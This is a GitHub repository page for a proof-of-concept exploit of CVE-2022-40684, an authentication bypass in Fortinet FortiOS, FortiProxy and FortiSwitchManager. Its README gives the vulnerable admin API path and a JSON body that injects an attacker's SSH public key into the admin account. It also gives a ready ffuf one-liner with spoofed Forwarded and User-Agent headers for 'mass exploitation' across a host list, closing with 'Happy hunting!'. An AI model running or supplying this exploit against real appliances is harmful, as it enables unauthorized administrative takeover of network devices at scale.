Skip to content
/ CVE-2022-40684-POC Public

Exploit for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager

License

MIT license
15 stars 2 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

kljunowsky/CVE-2022-40684-POC

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
CVE-2022-40684.py
CVE-2022-40684.py
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 

Repository files navigation

CVE-2022-40684-POC

FortiProxy / FortiOS Authentication bypass

Mass exploitation

/api/v2/cmdb/system/admin/<username>

{"ssh-public-key1": "<your-id_rsa.pub>"}

ffuf -c -w hosts.txt -u FUZZ/api/v2/cmdb/system/admin/admin -X PUT -H 'User-Agent: Report Runner' -H 'Content-Type: application/json' -H 'Forwarded: for="[127.0.0.1
]:8000";by=”[127.0.0.1]:9000";' -d '{"ssh-public-key1": "kljunowsky"}' -mr "SSH" -r

Happy hunting!

Requirements

ffuf Thanks @joohoi!

Twitter

LinkedIn

About

Exploit for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager

Topics

security exploit penetration-testing poc bugbounty authentication-bypass fortios fortiproxy cve-2022-40684

Resources

Readme

License

MIT license
Activity

Stars

15 stars

Watchers

1 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages